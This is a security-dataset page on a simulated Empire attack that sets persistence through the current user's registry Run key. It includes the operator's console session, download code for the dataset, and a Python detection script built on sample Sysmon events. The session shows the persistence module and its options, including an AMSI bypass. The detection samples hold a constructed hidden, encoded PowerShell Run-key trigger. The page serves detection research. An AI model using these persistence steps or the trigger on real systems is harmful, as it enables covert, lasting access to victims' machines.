Empire Userland Registry Run Keys#



Author: Roberto Rodriguez @Cyb3rWard0g

Creation Date:

Modification Date:

Tags: Local Registry Modification, Registry Run Keys

Dataset Description#

This dataset captures an adversary establishing persistence from a standard (non-elevated) user context by writing to the current user's Run key (HKCU:\Software\Microsoft\Windows\CurrentVersion\Run), the userland counterpart of the machine-wide HKLM Run key, which needs administrative rights. The Empire module used here stores the stager script in a separate registry value (HKCU:\Software\Microsoft\Windows\CurrentVersion\Debug) and adds a Run value named Updater that reads that value and executes it at the next logon. The dataset also captures the execution of the persistence mechanism, which results in a second Empire agent checking in from the same user context.

Simulation Metadata#








Adversary View#

(Empire: stager/multi/launcher) > 
(Empire: stager/multi/launcher) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
KU86XWEL ps     WORKSTATION5      THESHIRE\pgustavo       powershell         5376   5/0.0    2020-09-04 07:02:57  http            

(Empire: agents) > interact KU86XWEL
(Empire: KU86XWEL) > 
(Empire: KU86XWEL) > usemodule persistence/
elevated/registry*                 misc/add_netuser                   misc/install_ssp*                  powerbreach/resolver
elevated/rid_hijack*               misc/add_sid_history*              misc/memssp*                       userland/backdoor_lnk
elevated/schtasks*                 misc/debugger*                     misc/skeleton_key*                 userland/registry
elevated/wmi*                      misc/disable_machine_acct_change*  powerbreach/deaduser               userland/schtasks
elevated/wmi_updater*              misc/get_ssps                      powerbreach/eventlog*              
(Empire: KU86XWEL) > usemodule persistence/userland/registry
(Empire: powershell/persistence/userland/registry) > info

              Name: Invoke-Registry
            Module: powershell/persistence/userland/registry
        NeedsAdmin: False
        OpsecSafe: False
          Language: powershell
MinLanguageVersion: 2
        Background: False
  OutputExtension: None


  Persist a stager (or script) via the
  HKCU:SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry
  key. This has an easy detection/removal rating.



  Name             Required    Value                     Description
  ----             --------    -------                   -----------
  Agent            True        KU86XWEL                  Agent to run module on.                 
  Listener         False                                 Listener to use.                        
  Obfuscate        False       False                     Switch. Obfuscate the launcher          
                                                        powershell code, uses the               
                                                        ObfuscateCommand for obfuscation types. 
                                                        For powershell only.                    
  ObfuscateCommand False       Token\All\1               The Invoke-Obfuscation command to use.  
                                                        Only used if Obfuscate switch is True.  
                                                        For powershell only.                    
  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in 
                                                        the stager code.                        
  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   
                                                        the stager code.                        
  KeyName          True        Updater                   Key name for the run trigger.           
  RegPath          False       HKCU:Software\Microsoft\  Registry location to store the script   
                              Windows\CurrentVersion\D  code. Last element is the key name.     
  ADSPath          False                                 Alternate-data-stream location to store 
                                                        the script code.                        
  EventLogID       False                                 Store the script in the Application     
                                                        event log under the specified EventID.  
                                                        The ID needs to be unique/rare!         
  ExtFile          False                                 Use an external file for the payload    
                                                        instead of a stager.                    
  Cleanup          False                                 Switch. Cleanup the trigger and any     
                                                        script from specified location.         
  UserAgent        False       default                   User-agent string to use for the staging
                                                        request (default, none, or other).      
  Proxy            False       default                   Proxy to use for request (default, none,
                                                        or other).                              
  ProxyCreds       False       default                   Proxy credentials                       
                                                        ([domain\]username:password) to use for 
                                                        request (default, none, or other).      

(Empire: powershell/persistence/userland/registry) > set Listener http
(Empire: powershell/persistence/userland/registry) > execute
[>] Module is not opsec safe, run? [y/N] y
[*] Tasked KU86XWEL to run TASK_CMD_WAIT
[*] Agent KU86XWEL tasked with task ID 1
[*] Tasked agent KU86XWEL to run module powershell/persistence/userland/registry
(Empire: powershell/persistence/userland/registry) > 
Registry persistence established using listener http stored in HKCU:Software\Microsoft\Windows\CurrentVersion\Debug.

(Empire: powershell/persistence/userland/registry) > 
(Empire: powershell/persistence/userland/registry) > 
[*] Sending POWERSHELL stager (stage 1) to
[*] New agent SP7B3U2X checked in
[+] Initial agent SP7B3U2X from now active (Slack)
[*] Sending agent (stage 2) to SP7B3U2X at

(Empire: powershell/persistence/userland/registry) > agents

[*] Active agents:

Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener
----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------
KU86XWEL ps     WORKSTATION5      THESHIRE\pgustavo       powershell         5376   5/0.0    2020-09-04 07:07:17  http            
SP7B3U2X ps     WORKSTATION5      THESHIRE\pgustavo       powershell         1376   5/0.0    2020-09-04 07:09:04  http            

(Empire: agents) > interact SP7B3U2X
(Empire: SP7B3U2X) > shell whoami
[*] Tasked SP7B3U2X to run TASK_SHELL
[*] Agent SP7B3U2X tasked with task ID 1
(Empire: SP7B3U2X) > 
..Command execution completed.

(Empire: SP7B3U2X) >

Explore Datasets#

Download & Decompress Dataset#

import requests
from zipfile import ZipFile
from io import BytesIO

# The URL must be a string; the original cell was missing the quotes.
url = "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_persistence_registry_modification_run_keys_standard_user.zip"
zipFileRequest = requests.get(url)
zipFileRequest.raise_for_status()  # fail loudly on a bad download instead of unzipping an error page
zipFile = ZipFile(BytesIO(zipFileRequest.content))
# The archive holds a single JSON-lines file; extract it to the working directory and keep its path.
datasetJSONPath = zipFile.extract(zipFile.namelist()[0])

Read JSON File#

import pandas as pd

# One JSON object per line, hence lines=True; use the public pandas API rather than pandas.io.json.
df = pd.read_json(path_or_buf=datasetJSONPath, lines=True)
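As an added example, not part of the original dataset page or of Empire, the following Python walks through the detection logic a hunter would run once the events are loaded: it flags Sysmon Event 13 writes under a Run key, narrows them to the Invoke-Registry shape (a PowerShell trigger that reads its payload from another registry value), locates the value holding the stored stager, and correlates the trigger with the Event 1 process creation that executes it, covering both halves of the Dataset Description above. It runs offline over a handful of constructed events; the SID in USER_HIVE, the process IDs other than the agent PIDs shown in the adversary view, and the exact trigger command line are assumptions, while the Debug and Run\Updater paths are the ones the module reported.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample events, not records from the dataset. They use Sysmon's own
# field names for Event ID 13 (registry value set) and Event ID 1 (process
# creation). The Debug and Run\Updater paths come from the module output above;
# the SID in USER_HIVE, PIDs 2208/4120 and the exact trigger command line are
# assumptions made for this example.
USER_HIVE = "HKU\\S-1-5-21-1111111111-2222222222-3333333333-1105"
PS_EXE = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
ENC_BLOB = "JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgA..."
# Trigger modelled on the module's behaviour: read the stored script from the
# Debug value and run it as an encoded command in a hidden window (assumed form).
RUN_VALUE_CMD = (
    '"' + PS_EXE + '" -c "$x=$((gp HKCU:Software\\Microsoft\\Windows\\CurrentVersion Debug).Debug);'
    'powershell -Win Hidden -enc $x"'
)

SAMPLE_EVENTS: List[Dict] = [
    # 1. the agent (PID 5376 above) stores the stager in the Debug value
    {"EventID": 13, "Image": PS_EXE, "ProcessId": 5376,
     "TargetObject": USER_HIVE + "\\Software\\Microsoft\\Windows\\CurrentVersion\\Debug",
     "Details": ENC_BLOB},
    # 2. the same process writes the Run trigger named Updater
    {"EventID": 13, "Image": PS_EXE, "ProcessId": 5376,
     "TargetObject": USER_HIVE + "\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "Details": RUN_VALUE_CMD},
    # 3. a benign Run value written by an installer (must not be flagged as suspicious)
    {"EventID": 13, "Image": "C:\\Windows\\System32\\msiexec.exe", "ProcessId": 2208,
     "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SecurityHealth",
     "Details": "%windir%\\system32\\SecurityHealthSystray.exe"},
    # 4. at the next logon explorer.exe runs the trigger verbatim
    {"EventID": 1, "Image": PS_EXE, "ProcessId": 4120,
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": RUN_VALUE_CMD},
    # 5. the trigger re-launches PowerShell with the decoded script (the new agent, PID 1376 above)
    {"EventID": 1, "Image": PS_EXE, "ProcessId": 1376,
     "ParentImage": PS_EXE, "CommandLine": "powershell -Win Hidden -enc " + ENC_BLOB},
]

# A value written directly under a Run or RunOnce key; group 2 is the value name.
RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\([^\\]+)$", re.IGNORECASE)
# A Run value that starts PowerShell and either reads another registry value
# (gp / Get-ItemProperty) or passes an encoded command: the Invoke-Registry shape.
INDIRECT_PS_RE = re.compile(r"powershell.*(\bgp\b|get-itemproperty|-enc\b)", re.IGNORECASE)
# "(gp <path> <name>)" inside the trigger tells us which value holds the payload.
GP_RE = re.compile(r"\(gp\s+(\S+?)\s+(\S+?)\)", re.IGNORECASE)


def run_key_writes(events: List[Dict]) -> List[Dict]:
    """Event 13 records that set a value under Run/RunOnce (broad, noisy on its own)."""
    return [e for e in events
            if e.get("EventID") == 13 and RUN_KEY_RE.search(e.get("TargetObject", ""))]


def suspicious_run_values(events: List[Dict]) -> List[Dict]:
    """Run-key writes whose command launches PowerShell with an indirect payload."""
    return [e for e in run_key_writes(events) if INDIRECT_PS_RE.search(e.get("Details", ""))]


def stored_payloads(events: List[Dict]) -> List[Tuple[str, str]]:
    """(Run value name, TargetObject) of the Event 13 that wrote the value a trigger reads."""
    hits = []
    for trig in suspicious_run_values(events):
        m = GP_RE.search(trig["Details"])
        if not m:
            continue
        suffix = "\\currentversion\\" + m.group(2).lower()
        for e in events:
            if e.get("EventID") == 13 and e.get("TargetObject", "").lower().endswith(suffix):
                hits.append((RUN_KEY_RE.search(trig["TargetObject"]).group(2), e["TargetObject"]))
    return hits


def _norm(cmd: str) -> str:
    # Ignore quoting and whitespace differences between the stored value and the launched command.
    return " ".join(cmd.replace('"', "").split()).lower()


def persistence_executed(events: List[Dict]) -> List[Tuple[str, int, str]]:
    """Correlate Run values with process creations that execute them: (value name, PID, parent)."""
    triggers = {_norm(e["Details"]): RUN_KEY_RE.search(e["TargetObject"]).group(2)
                for e in run_key_writes(events)}
    hits = []
    for e in events:
        if e.get("EventID") != 1:
            continue
        name = triggers.get(_norm(e.get("CommandLine", "")))
        if name:
            hits.append((name, e["ProcessId"], e.get("ParentImage", "")))
    return hits


if __name__ == "__main__":
    for e in suspicious_run_values(SAMPLE_EVENTS):
        print("suspicious Run value:", e["TargetObject"])
    print("payload stored at:", stored_payloads(SAMPLE_EVENTS))
    print("trigger executed:", persistence_executed(SAMPLE_EVENTS))
```

To run the same functions over the dataset loaded above, pass df.to_dict("records") instead of SAMPLE_EVENTS; the dataset keeps Sysmon's field names, so the same keys apply, but check that EventID is numeric in the loaded frame (coerce with astype(int) if it arrived as a string). The broad run_key_writes match is the noisy first cut; suspicious_run_values and persistence_executed are what separate this module's footprint from ordinary installer activity.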

Access Security Events#